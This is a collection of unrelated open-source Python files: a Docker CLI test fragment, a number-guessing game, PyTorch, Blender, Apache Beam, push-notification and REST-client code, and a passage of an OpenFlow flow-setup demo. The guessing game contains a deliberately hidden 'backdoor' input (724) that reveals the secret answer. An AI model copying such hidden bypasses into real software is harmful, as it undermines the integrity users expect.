Uses incorrectly large uid number (2147483648)
"""
    def _init_test_dependent(self):
self.sub_stuff['execution_failure'] = ("Uids and gids must be in "
"range 0-2147483647")
self.sub_stuff['subargs'] = ['--rm', '--interactive',
'--user=2147483648']
| luwensu/autotest-docker | subtests/docker_cli/run_user/run_user.py | Python | gpl-2.0 | 10,198 |
# coding=utf-8
# For the Chinese-language version; use UTF-8 characters.
import random
secret = random.randint(1, 99)
guess = 0
tries = 0
# Load the random module and generate a random integer from 1-99 as the answer;
# initialize the guessed number (guess) and the try counter (tries).
print("我是个可怕的海盗,罗伯特。我有个秘密!")
print("猜一个1-99的整数,你有6的机会。")
#开场语,"我是可怕的海盗罗伯特,我有个秘密!"
#开场语,"猜一个1-99的整数,你有6次机会。"
while int(guess) != secret and tries < 6:
    guess = input("选一个吧:")
    # Loop condition: keep playing while the guess is wrong and tries remain.
    if int(guess) == 724:
        print(secret)
    # Backdoor reserved for "BF": prints the secret number directly (default 724).
    elif int(guess) < 1 or int(guess) > 99:
        print("超出范围啦!")
    # Check whether the input is within the valid range.
    elif int(guess) < secret and 0 < int(guess) < 100:
        print("太低了!")
    # The guess is lower than the secret number.
    elif int(guess) > secret and 0 < int(guess) < 100:
        print("高了!高了!")
    # The guess is higher than the secret number.
    tries = tries + 1
    # Each finished round adds one to the try counter.
if int(guess) == secret:
    print("漂亮!你明白了吗?!我找到了我的秘密!")
# The player guessed correctly; print the win message.
elif tries == 6:
    print("别再猜测了!下次好运,伙计!")
    print("秘密号码是:", secret)
# The player is out of chances; reveal the answer.
| duaiyumi/python-test | NumGuessGame_vip.py | Python | gpl-3.0 | 1,598 |
import torch
from .Module import Module
class SoftShrink(Module):
def __init__(self, lambd=0.5):
super(SoftShrink, self).__init__()
self.lambd = lambd
def updateOutput(self, input):
self._backend.SoftShrink_updateOutput(
self._backend.library_state,
input,
self.output,
self.lambd
)
return self.output
def updateGradInput(self, input, gradOutput):
self._backend.SoftShrink_updateGradInput(
self._backend.library_state,
input,
gradOutput,
self.gradInput,
self.lambd
)
return self.gradInput
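# Editor's note: soft shrinkage applies, elementwise,
#   f(x) = x - lambd  if x >  lambd
#          x + lambd  if x < -lambd
#          0          otherwise
# Assumed usage through the legacy API (the backend call is dispatched above):
#   m = SoftShrink(0.5)
#   m.updateOutput(torch.Tensor([-1.0, 0.2, 1.0]))  # -> [-0.5, 0.0, 0.5]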
| RPGOne/Skynet | pytorch-master/torch/legacy/nn/SoftShrink.py | Python | bsd-3-clause | 678 |
#!python.exe
import find_distances
stations_in = [find_distances.Station("Raynes Park, UK", "RAY")]
stations_out = find_distances.get_stations_close_to(stations_in, "driving", "Wimbledon, UK", 7000)
for s in stations_out:
print s
stations_out = find_distances.get_stations_close_to(stations_in, "transit", "Wimbledon, UK", 7000)
for s in stations_out:
print s
| PeterSchuebel/home-finder | test_find_distances.py | Python | gpl-2.0 | 385 |
from asposewords import Settings
from com.aspose.words import Document
from com.aspose.words import NodeType
from com.aspose.words import AutoFitBehavior
class AutoFitTables:
def __init__(self):
self.dataDir = Settings.dataDir + 'programming_documents/'
doc = Document(self.dataDir + "TestFile.doc")
self.autofit_table_to_contents(doc)
self.autofit_table_to_fixed_width_columns(doc)
self.autofit_table_to_window(doc)
def autofit_table_to_contents(self, doc):
table = doc.getChild(NodeType.TABLE, 0, True)
# Auto fit the table to the cell contents
table.autoFit(AutoFitBehavior.AUTO_FIT_TO_CONTENTS)
# Save the document to disk.
doc.save(self.dataDir + "AutoFitToContents.doc")
print "Table auto fit to contents successfully."
def autofit_table_to_fixed_width_columns(self, doc):
table = doc.getChild(NodeType.TABLE, 0, True)
# Disable autofitting on this table.
table.autoFit(AutoFitBehavior.FIXED_COLUMN_WIDTHS)
# Save the document to disk.
doc.save(self.dataDir + "AutoFitToFixedWidth.doc")
print "Table auto fit to fixed width columns successfully."
def autofit_table_to_window(self, doc):
table = doc.getChild(NodeType.TABLE, 0, True)
# Autofit the first table to the page width.
table.autoFit(AutoFitBehavior.AUTO_FIT_TO_WINDOW)
# Save the document to disk.
doc.save(self.dataDir + "AutoFitToWindow.doc")
print "Table auto fit to windows successfully."
if __name__ == '__main__':
AutoFitTables() | aspose-words/Aspose.Words-for-Java | Plugins/Aspose_Words_Java_for_Jython/asposewords/programming_documents/AutoFitTables.py | Python | mit | 1,685 |
#!/usr/bin/env python
"""
/*******************************************************************************
* Copyright (c) cortical.io GmbH. All rights reserved.
*
* This software is confidential and proprietary information.
* You shall use it only in accordance with the terms of the
* license agreement you entered into with cortical.io GmbH.
******************************************************************************/
"""
from cortical.models import fingerprint
from cortical.models import languageRest
from cortical.models import text
class TextApi(object):
def __init__(self, apiClient):
self.apiClient = apiClient
def getRepresentationForText(self, retina_name, body, ):
"""Get a retina representation of a text
Args:
body, str: The text to be evaluated (required)
retina_name, str: The retina name (required)
Returns: Array[Fingerprint]
"""
resourcePath = '/text'
method = 'POST'
queryParams = {}
headerParams = {'Accept': 'Application/json', 'Content-Type': 'application/json'}
postData = None
queryParams['retina_name'] = retina_name
postData = body
response = self.apiClient._callAPI(resourcePath, method, queryParams, postData, headerParams)
return [fingerprint.Fingerprint(**r) for r in response.json()]
def getKeywordsForText(self, retina_name, body, ):
"""Get a list of keywords from the text
Args:
body, str: The text to be evaluated (required)
retina_name, str: The retina name (required)
Returns: Array[str]
"""
resourcePath = '/text/keywords'
method = 'POST'
queryParams = {}
headerParams = {'Accept': 'Application/json', 'Content-Type': 'application/json'}
postData = None
queryParams['retina_name'] = retina_name
postData = body
response = self.apiClient._callAPI(resourcePath, method, queryParams, postData, headerParams)
return response.json()
def getTokensForText(self, retina_name, body, POStags=None, ):
"""Get tokenized input text
Args:
body, str: The text to be tokenized (required)
POStags, str: Specify desired POS types (optional)
retina_name, str: The retina name (required)
Returns: Array[str]
"""
resourcePath = '/text/tokenize'
method = 'POST'
queryParams = {}
headerParams = {'Accept': 'Application/json', 'Content-Type': 'application/json'}
postData = None
queryParams['retina_name'] = retina_name
queryParams['POStags'] = POStags
postData = body
response = self.apiClient._callAPI(resourcePath, method, queryParams, postData, headerParams)
return response.json()
def getSlicesForText(self, retina_name, body, get_fingerprint=None, start_index=0, max_results=10):
"""Get a list of slices of the text
Args:
body, str: The text to be evaluated (required)
get_fingerprint, bool: Configure if the fingerprint should be returned as part of the results (optional)
retina_name, str: The retina name (required)
start_index, int: The start-index for pagination (optional) (optional)
max_results, int: Max results per page (optional) (optional)
Returns: Array[Text]
"""
resourcePath = '/text/slices'
method = 'POST'
queryParams = {}
headerParams = {'Accept': 'Application/json', 'Content-Type': 'application/json'}
postData = None
queryParams['retina_name'] = retina_name
queryParams['start_index'] = start_index
queryParams['max_results'] = max_results
queryParams['get_fingerprint'] = get_fingerprint
postData = body
response = self.apiClient._callAPI(resourcePath, method, queryParams, postData, headerParams)
return [text.Text(**r) for r in response.json()]
def getRepresentationsForBulkText(self, retina_name, body, sparsity=1.0):
"""Bulk get Fingerprint for text.
Args:
body, ExpressionOperation: The JSON encoded expression to be evaluated (required)
retina_name, str: The retina name (required)
sparsity, float: Sparsify the resulting expression to this percentage (optional)
Returns: Array[Fingerprint]
"""
resourcePath = '/text/bulk'
method = 'POST'
queryParams = {}
headerParams = {'Accept': 'Application/json', 'Content-Type': 'application/json'}
postData = None
queryParams['retina_name'] = retina_name
queryParams['sparsity'] = sparsity
postData = body
response = self.apiClient._callAPI(resourcePath, method, queryParams, postData, headerParams)
return [fingerprint.Fingerprint(**r) for r in response.json()]
def getLanguage(self, body, ):
"""Detect the language of a text
Args:
body, str: Your input text (UTF-8) (required)
Returns: LanguageRest
"""
resourcePath = '/text/detect_language'
method = 'POST'
queryParams = {}
headerParams = {'Accept': 'Application/json', 'Content-Type': 'application/json'}
postData = None
postData = body
response = self.apiClient._callAPI(resourcePath, method, queryParams, postData, headerParams)
return languageRest.LanguageRest(**response.json())
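# Editor's sketch (assumed wiring): any client object exposing _callAPI() works;
# the module path, constructor arguments and retina name below are assumptions.
#
#   from cortical.apiClient import ApiClient
#   api = TextApi(ApiClient(...))
#   api.getKeywordsForText("en_associative", "SDKs simplify REST integration.")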
| cortical-io/python-client-sdk | cortical/textApi.py | Python | bsd-2-clause | 5,619 |
import bpy
import colorsys
from math import sin, cos, pi
from mathutils import Euler
TAU = 2*pi
def rainbow_lights(r=5, n=100, freq=2, energy=100):
for i in range(n):
t = float(i)/float(n)
pos = (r*sin(TAU*t), r*cos(TAU*t), r*sin(freq*TAU*t))
# Create lamp
bpy.ops.object.add(type='LIGHT', location=pos)
obj = bpy.context.object
obj.data.type = 'POINT'
# Apply gamma correction for Blender
color = tuple(pow(c, 2.2) for c in colorsys.hsv_to_rgb(t, 0.6, 1))
# Set HSV color and lamp energy
obj.data.color = color
obj.data.energy = energy
if __name__ == '__main__':
# Remove all elements
bpy.ops.object.select_all(action="SELECT")
bpy.ops.object.delete(use_global=False)
# Set cursor to (0, 0, 0)
bpy.context.scene.cursor.location = (0, 0, 0)
# Create camera
bpy.ops.object.add(type='CAMERA', location=(0, -3.0, 0))
camera = bpy.context.object
camera.data.lens = 35
camera.rotation_euler = Euler((pi/2, 0, 0), 'XYZ')
# Make this the current camera
bpy.context.scene.camera = camera
# Create lamps
rainbow_lights(5, 100, 2, energy=100)
# Create object
bpy.ops.mesh.primitive_ico_sphere_add(
location=(0,0,0),
subdivisions=3,
radius=1)
obj = bpy.context.object
# Add subsurf modifier
modifier = obj.modifiers.new('Subsurf', 'SUBSURF')
modifier.levels = 2
modifier.render_levels = 2
# Smooth surface
for p in obj.data.polygons:
p.use_smooth = True
# Add Glossy BSDF material
mat = bpy.data.materials.new('Material')
mat.use_nodes = True
node = mat.node_tree.nodes[0]
node.inputs[0].default_value = (0.8, 0.8, 0.8, 1) # Base color
    node.inputs[4].default_value = 0.5 # Metallic
node.inputs[7].default_value = 0.5 # Roughness
obj.data.materials.append(mat)
# Render image
scene = bpy.context.scene
scene.render.resolution_x = 512
scene.render.resolution_y = 512
scene.render.resolution_percentage = 100
scene.render.engine = 'CYCLES'
#scene.render.engine = 'BLENDER_EEVEE'
scene.render.filepath = 'rendering/simple_sphere.png'
bpy.ops.render.render(write_still=True)
| njanakiev/blender-scripting-intro | scripts/simple_sphere.py | Python | mit | 2,273 |
import argparse
import os
import sys
from collections import defaultdict
from postprocess import processdata
from utility import utility
import config
parser = argparse.ArgumentParser(
description="Counts for a given metric how often it occurs per hour. "
+ "Creates then daily and a monthly tsv file containg the hour, the "
+ "metric and the queryCount")
parser.add_argument("metric", type=str, help="the metric which we want to "
+ "count (without #)")
parser.add_argument("--monthsFolder", "-m", default=config.monthsFolder,
type=str, help="the folder in which the months directory "
+ "are residing")
parser.add_argument("--ignoreLock", "-i", help="Ignore locked file and execute"
+ " anyways", action="store_true")
parser.add_argument("month", type=str,
help="the month which we're interested in")
if (len(sys.argv[1:]) == 0):
parser.print_help()
parser.exit()
args = parser.parse_args()
if os.path.isfile(utility.addMissingSlash(args.monthsFolder)
+ utility.addMissingSlash(args.month) + "locked") \
and not args.ignoreLock:
print "ERROR: The month " + args.month + " is being edited at the moment."
+ "Use -i if you want to force the execution of this script."
sys.exit()
class HourlyMetricCountHandler:
dailyData = dict()
monthlyData = dict()
metric = str
def __init__(self, metric):
self.metric = metric
def handle(self, sparqlQuery, processed):
if (processed['#Valid'] == 'VALID' or processed['#Valid'] == '1'):
if (processed['#day'] not in self.dailyData):
self.dailyData[processed['#day']] = dict()
if (processed['#hour'] not in self.dailyData[processed['#day']]):
self.dailyData[processed['#day']][processed['#hour']] \
= defaultdict(int)
if (processed['#hour'] not in self.monthlyData):
self.monthlyData[processed['#hour']] = defaultdict(int)
self.dailyData[processed['#day']][processed['#hour']] \
[processed['#' + self.metric]] += 1
self.monthlyData[processed['#hour']] \
[processed['#' + self.metric]] += 1
def saveToFiles(self, outputFolder):
outputFolder = outputFolder + "/"
if not os.path.exists(outputFolder + "/" + self.metric):
os.makedirs(outputFolder + "/" + self.metric)
header = "hour\t" + self.metric + "\tcount\n"
for day, data in self.dailyData.iteritems():
with open(outputFolder + self.metric + "/" + "%02d" % day
+ "ClassifiedBotsData.tsv", "w") as outputFile:
outputFile.write(header)
for hour, metricDict in data.iteritems():
for metric in metricDict.iterkeys():
outputFile.write(str(hour) + "\t" + str(metric)
+ "\t" + str(data[hour][metric])
+ "\n")
with open(outputFolder + self.metric + "/" + "TotalClassifiedBotsData.tsv",
"w") as outputFile:
outputFile.write(header)
for hour, metricDict in self.monthlyData.iteritems():
for metric in metricDict.iterkeys():
outputFile.write(str(hour) + "\t" + str(metric) + "\t"
+ str(self.monthlyData[hour][metric])
+ "\n")
handler = HourlyMetricCountHandler(args.metric)
processdata.processMonth(handler, args.month, args.monthsFolder)
print args.monthsFolder + "/" + args.month \
+ "/processedLogData/hourlyMetricCountData"
handler.saveToFiles(args.monthsFolder + "/" + args.month
+ "/processedLogData/hourlyMetricCountData")
| Wikidata/QueryAnalysis | tools/getHourlyMetricCount.py | Python | apache-2.0 | 3,940 |
from pyscp import core, utils, snapshot, wikidot | anqxyr/pyscp | pyscp/__init__.py | Python | mit | 48 |
from scope import *
class CPPCompiler:
pass
class ObjectCompiler(CPPCompiler):
def __init__(self, name):
self.parName = name + "&"
self.typeName = name
self.retName = name
self.deserial = "%s = %s.deserializeObject(inStream)" % ("%s",name)
self.serial = "cxn.serializeObject(%s, outStream)" % ("%s")
AbstractCompiler = ExceptionCompiler = ObjectCompiler
class RawTypeCompiler(CPPCompiler):
""" Compiler for raw types, available natively in C++.
This class encapsulates the compilation of those types which will
be addressed in parameter lists as their raw C++ type.
"""
def __init__(self, name, nativeName, argByReference):
self.parName = nativeName + "&" if argByReference else ""
self.typeName = nativeName
self.retName = nativeName
self.deserial = "%s = %s::readFrom(inStream)" % ("%s", name)
self.serial = "%s::writeTo(%s, outStream)" % (name, "%s")
def buildBaseMap():
serviceObjectTypes = [
"URI", "ConnectionID", "BusID", "RouteToken",
"ObjectID", "TransverseID", "Reference", "MessageID"]
typeTranslation = dict(
Int8 = ("int8_t", False),
Int16 = ("int16_t", False),
Int32 = ("int32_t", False),
Int64 = ("int64_t", False),
UInt8 = ("uint8_t", False),
UInt16 = ("uint16_t", False),
UInt32 = ("uint32_t", False),
UInt64 = ("uint64_t", False),
ASCIIString = ("std::string", True),
ByteString = ("std::vector<uint8_t>", True),
UnicodeString = ("std::wstring", True))
builtinTypeMap = {}
for key, (value, ref) in typeTranslation.items():
compiler = RawTypeCompiler(key, value, ref)
builtinTypeMap[key] = BasicType(key, compiler)
for name in serviceObjectTypes:
compiler = ObjectCompiler(name)
builtinTypeMap[name] = BasicType(name, compiler)
compiler = ObjectCompiler("!!TODO!!")
builtinTypeMap["GetMyConnection"] = ComplexType(name, compiler)
return builtinTypeMap
def buildOutput(processed, oHandle):
oHandle.write("#include <ripley/service>\n")
# Write out abstract classes
for abstract in processed.abstract:
outputAbstract(abstract, oHandle)
for classDef in processed.classes:
outputClassBase(classDef, oHandle)
def outputAbstract(abstract, oHandle):
""" Write out the class definition of an 'abstract class'.
An abstract class is a serializable type which can be passed by
reference but admits no interface whatsoever. Basically allows
a 'local' object to be passed back and forth inside a blackbox.
"""
string = ("class %s : public PassByReference {\n"
"protected:\n"
"\tvirtual void __abstractClassKludge() override {};\n"
"};\n\n")
pars = (abstract.name,)
oHandle.write(string%pars)
def outputClassBase(classDef, oHandle):
substring = ["class %sProxy;\n\n"
"class %s : public PassByReference {\n"
"public:\n"
"\ttypedef %sProxy ProxyClass;\n"]
pars = (classDef.name,) * 3
for method in classDef.methods:
substring.append(formatMethodPrototype(method))
substring.append("protected:\n")
substring.append("\tvirtual void __abstractClassKludge() override {};\n")
substring.append("};\n\n")
oHandle.write("".join(substring) % pars)
def formatMethodPrototype(method):
string = "\tvirtual %s %s(%s) = 0;\n"
if isinstance(method, Evaluation):
build = []
if len(method.returns) > 1:
for _,parType in method.returns:
build.append(parType.compiler.retName)
retString = "std::tuple<" + ",".join(build) + ">"
elif len(method.returns) == 1:
retString = method.returns[0][1].compiler.retName
else:
retString = "void"
else:
retString = "void"
build = []
for _,parType in method.params:
build.append(parType.compiler.parName)
parString = ", ".join(build)
return string % (retString, method.name, parString)
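# Editor's note: with the parName fix above, an Evaluation named "ping" taking
# one UInt32 parameter and returning a single Int32 is formatted roughly as
#   "\tvirtual int32_t ping(uint32_t) = 0;\n"
# while by-reference raw types such as ASCIIString render as "std::string&".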
| disnesquick/ripley | codegen/cpp.py | Python | gpl-2.0 | 3,787 |
from django.core.exceptions import ImproperlyConfigured
from django.utils.six import string_types
from ..settings import PUSH_NOTIFICATIONS_SETTINGS as SETTINGS
from .base import BaseConfig
__all__ = [
"LegacyConfig"
]
class empty(object):
pass
class LegacyConfig(BaseConfig):
def _get_application_settings(self, application_id, settings_key, error_message):
"""Legacy behaviour"""
if not application_id:
value = SETTINGS.get(settings_key, empty)
if value is empty:
raise ImproperlyConfigured(error_message)
return value
else:
msg = (
"LegacySettings does not support application_id. To enable "
"multiple application support, use push_notifications.conf.AppSettings."
)
raise ImproperlyConfigured(msg)
def get_gcm_api_key(self, application_id=None):
msg = (
'Set PUSH_NOTIFICATIONS_SETTINGS["GCM_API_KEY"] to send messages through GCM.'
)
return self._get_application_settings(application_id, "GCM_API_KEY", msg)
def get_fcm_api_key(self, application_id=None):
msg = (
'Set PUSH_NOTIFICATIONS_SETTINGS["FCM_API_KEY"] to send messages through FCM.'
)
return self._get_application_settings(application_id, "FCM_API_KEY", msg)
def get_post_url(self, cloud_type, application_id=None):
key = "{}_POST_URL".format(cloud_type)
msg = (
'Set PUSH_NOTIFICATIONS_SETTINGS["{}"] to send messages through {}.'.format(
key, cloud_type
)
)
return self._get_application_settings(application_id, key, msg)
def get_error_timeout(self, cloud_type, application_id=None):
key = "{}_ERROR_TIMEOUT".format(cloud_type)
msg = (
'Set PUSH_NOTIFICATIONS_SETTINGS["{}"] to send messages through {}.'.format(
key, cloud_type
)
)
return self._get_application_settings(application_id, key, msg)
def get_max_recipients(self, cloud_type, application_id=None):
key = "{}_MAX_RECIPIENTS".format(cloud_type)
msg = (
'Set PUSH_NOTIFICATIONS_SETTINGS["{}"] to send messages through {}.'.format(
key, cloud_type
)
)
return self._get_application_settings(application_id, key, msg)
def get_apns_certificate(self, application_id=None):
r = self._get_application_settings(
application_id, "APNS_CERTIFICATE",
"You need to setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
)
if not isinstance(r, string_types):
# probably the (Django) file, and file path should be got
if hasattr(r, "path"):
return r.path
elif (hasattr(r, "has_key") or hasattr(r, "__contains__")) and "path" in r:
return r["path"]
else:
msg = (
"The APNS certificate settings value should be a string, or "
"should have a 'path' attribute or key"
)
raise ImproperlyConfigured(msg)
return r
def get_apns_use_sandbox(self, application_id=None):
msg = "Setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
return self._get_application_settings(application_id, "APNS_USE_SANDBOX", msg)
def get_apns_use_alternative_port(self, application_id=None):
msg = "Setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
return self._get_application_settings(application_id, "APNS_USE_ALTERNATIVE_PORT", msg)
def get_apns_topic(self, application_id=None):
msg = "Setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
return self._get_application_settings(application_id, "APNS_TOPIC", msg)
def get_apns_host(self, application_id=None):
msg = "Setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
return self._get_application_settings(application_id, "APNS_HOST", msg)
def get_apns_port(self, application_id=None):
msg = "Setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
return self._get_application_settings(application_id, "APNS_PORT", msg)
def get_apns_feedback_host(self, application_id=None):
msg = "Setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
return self._get_application_settings(application_id, "APNS_FEEDBACK_HOST", msg)
def get_apns_feedback_port(self, application_id=None):
msg = "Setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
return self._get_application_settings(application_id, "APNS_FEEDBACK_PORT", msg)
def get_wns_package_security_id(self, application_id=None):
msg = "Setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
return self._get_application_settings(application_id, "WNS_PACKAGE_SECURITY_ID", msg)
def get_wns_secret_key(self, application_id=None):
msg = "Setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
return self._get_application_settings(application_id, "WNS_SECRET_KEY", msg)
def get_wp_post_url(self, application_id, browser):
msg = "Setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
return self._get_application_settings(application_id, "WP_POST_URL", msg)[browser]
def get_wp_private_key(self, application_id=None):
msg = "Setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
return self._get_application_settings(application_id, "WP_PRIVATE_KEY", msg)
def get_wp_claims(self, application_id=None):
msg = "Setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
return self._get_application_settings(application_id, "WP_CLAIMS", msg)
| matthewh/django-push-notifications | push_notifications/conf/legacy.py | Python | mit | 5,166 |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A workflow emitting the top k most common words for each prefix."""
from __future__ import absolute_import
import argparse
import logging
import re
import apache_beam as beam
from apache_beam.io import ReadFromText
from apache_beam.io import WriteToText
from apache_beam.utils.pipeline_options import PipelineOptions
from apache_beam.utils.pipeline_options import SetupOptions
def run(argv=None):
parser = argparse.ArgumentParser()
parser.add_argument('--input',
required=True,
help='Input file to process.')
parser.add_argument('--output',
required=True,
help='Output file to write results to.')
known_args, pipeline_args = parser.parse_known_args(argv)
# We use the save_main_session option because one or more DoFn's in this
# workflow rely on global context (e.g., a module imported at module level).
pipeline_options = PipelineOptions(pipeline_args)
pipeline_options.view_as(SetupOptions).save_main_session = True
p = beam.Pipeline(options=pipeline_options)
(p # pylint: disable=expression-not-assigned
| 'read' >> ReadFromText(known_args.input)
| 'split' >> beam.FlatMap(lambda x: re.findall(r'[A-Za-z\']+', x))
| 'TopPerPrefix' >> TopPerPrefix(5)
| 'format' >> beam.Map(
lambda (prefix, candidates): '%s: %s' % (prefix, candidates))
| 'write' >> WriteToText(known_args.output))
p.run()
class TopPerPrefix(beam.PTransform):
def __init__(self, count):
super(TopPerPrefix, self).__init__()
self._count = count
def expand(self, words):
"""Compute the most common words for each possible prefixes.
Args:
words: a PCollection of strings
Returns:
A PCollection of most common words with each prefix, in the form
(prefix, [(count, word), (count, word), ...])
"""
return (words
| beam.combiners.Count.PerElement()
| beam.FlatMap(extract_prefixes)
| beam.combiners.Top.LargestPerKey(self._count))
def extract_prefixes((word, count)):
for k in range(1, len(word) + 1):
prefix = word[:k]
yield prefix, (count, word)
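# A sketch of the intermediate data (illustrative, not part of the pipeline):
# after Count.PerElement, an element such as ('beam', 3) is expanded by
# extract_prefixes into
#
#   ('b', (3, 'beam')), ('be', (3, 'beam')),
#   ('bea', (3, 'beam')), ('beam', (3, 'beam'))
#
# and Top.LargestPerKey(self._count) then keeps the largest (count, word)
# pairs per prefix, which the 'format' step renders one prefix per line.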
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
run()
| jasonkuster/beam | sdks/python/apache_beam/examples/complete/autocomplete.py | Python | apache-2.0 | 3,029 |
"""Constants.
From pygame:
QUIT
MOUSEBUTTONDOWN
MOUSEBUTTONUP
MOUSEMOTION
KEYDOWN
PGU specific:
ENTER
EXIT
BLUR
FOCUS
CLICK
CHANGE
OPEN
CLOSE
INIT
Other:
NOATTR
"""
import pygame
from pygame.locals import QUIT, MOUSEBUTTONDOWN, MOUSEBUTTONUP, MOUSEMOTION, KEYDOWN, USEREVENT
ENTER = pygame.locals.USEREVENT + 0
EXIT = pygame.locals.USEREVENT + 1
BLUR = pygame.locals.USEREVENT + 2
FOCUS = pygame.locals.USEREVENT + 3
CLICK = pygame.locals.USEREVENT + 4
CHANGE = pygame.locals.USEREVENT + 5
OPEN = pygame.locals.USEREVENT + 6
CLOSE = pygame.locals.USEREVENT + 7
INIT = 'init'
class NOATTR:
pass
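# Illustrative usage sketch (assumed, not part of this module): these
# constants are typically used when wiring PGU widget callbacks, e.g.
#
#   import pgu.gui as gui
#   btn = gui.Button("Quit")
#   btn.connect(gui.CLICK, app.quit)
#
# where "app" stands in for whatever application object is in scope.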
| smathot/opensesame_questionnaire_plugins | multiple_choice/pgu/gui/const.py | Python | gpl-2.0 | 619 |
#!/usr/bin/python
# Copyright (c) 2015, BROCADE COMMUNICATIONS SYSTEMS, INC
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
"""
@authors: Sergei Garbuzov
@status: Development
@version: 1.1.0
"""
import time
from pybvc.controller.controller import Controller
from pybvc.openflowdev.ofswitch import (OFSwitch,
FlowEntry,
Match,
Instruction,
SetNwSrcAction,
SetNwDstAction,
SetTpSrcAction,
SetTpDstAction,
SetFieldAction,
OutputAction)
from pybvc.common.utils import load_dict_from_file
from pybvc.common.status import STATUS
from pybvc.common.constants import (ETH_TYPE_IPv4,
IP_PROTO_TCP,
IP_PROTO_UDP)
def delete_flows(ofswitch, table_id, flow_ids):
for flow_id in flow_ids:
result = ofswitch.delete_flow(table_id, flow_id)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("<<< Flow with id of '%s' successfully removed "
"from the Controller" % flow_id)
else:
print ("!!!Flow '%s' removal error, reason: %s" %
(flow_id, status.brief()))
def of_demo_40():
f = "cfg.yml"
d = {}
if(load_dict_from_file(f, d) is False):
print("Config file '%s' read error: " % f)
exit(0)
try:
ctrlIpAddr = d['ctrlIpAddr']
ctrlPortNum = d['ctrlPortNum']
ctrlUname = d['ctrlUname']
ctrlPswd = d['ctrlPswd']
nodeName = d['nodeName']
rundelay = d['rundelay']
except:
print ("Failed to get Controller device attributes")
exit(0)
print ("<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
print ("<<< Demo 40 Start")
print ("<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
ctrl = Controller(ctrlIpAddr, ctrlPortNum, ctrlUname, ctrlPswd)
ofswitch = OFSwitch(ctrl, nodeName)
print ("<<< 'Controller': %s, 'OpenFlow' switch: '%s'" %
(ctrlIpAddr, nodeName))
first_flow_id = 110
# ---------------------------------------------------
# First flow entry
# ---------------------------------------------------
table_id = 0
flow_id = first_flow_id
flow_name = "Modify IP packet example1"
priority = 900
cookie = 1300
match_in_port = 10
match_eth_type = ETH_TYPE_IPv4
match_ip_proto = IP_PROTO_TCP
match_ipv4_src_addr = "192.1.2.0/24"
match_ipv4_dst_addr = "173.194.123.40/32"
match_tcp_dst_port = 8080
act_mod_ipv4_src_addr = "212.16.1.8/32"
act_mod_ipv4_dst_addr = "52.87.12.11/32"
act_mod_tcp_src_port = 8888
act_mod_tcp_dst_port = 9999
act_out_port = 119
print "\n"
print ("<<< Set OpenFlow flow on the Controller")
print (" Match: Input Port (%s)\n"
" Ethernet Type (%s)\n"
" IP Protocol (%s)\n"
" IPv4 Source Address (%s)\n"
" IPv4 Destination Address (%s)\n"
" TCP Destination Port (%s)" %
(match_in_port,
hex(match_eth_type),
match_ip_proto,
match_ipv4_src_addr,
match_ipv4_dst_addr,
match_tcp_dst_port))
print (" Actions: Modify IPv4 Source Address (%s)\n"
" Modify IPv4 Destination Address (%s)\n"
" Modify TCP Source Port (%s)\n"
" Modify TCP Destination Port (%s)\n"
" Output (%s)" %
(act_mod_ipv4_src_addr,
act_mod_ipv4_dst_addr,
act_mod_tcp_src_port,
act_mod_tcp_dst_port,
act_out_port))
time.sleep(rundelay)
# Allocate a placeholder for the Flow Entry
flow_entry1 = FlowEntry()
# Generic attributes of the Flow Entry
flow_entry1.set_flow_table_id(table_id)
flow_entry1.set_flow_name(flow_name)
flow_entry1.set_flow_id(flow_id)
flow_entry1.set_flow_cookie(cookie)
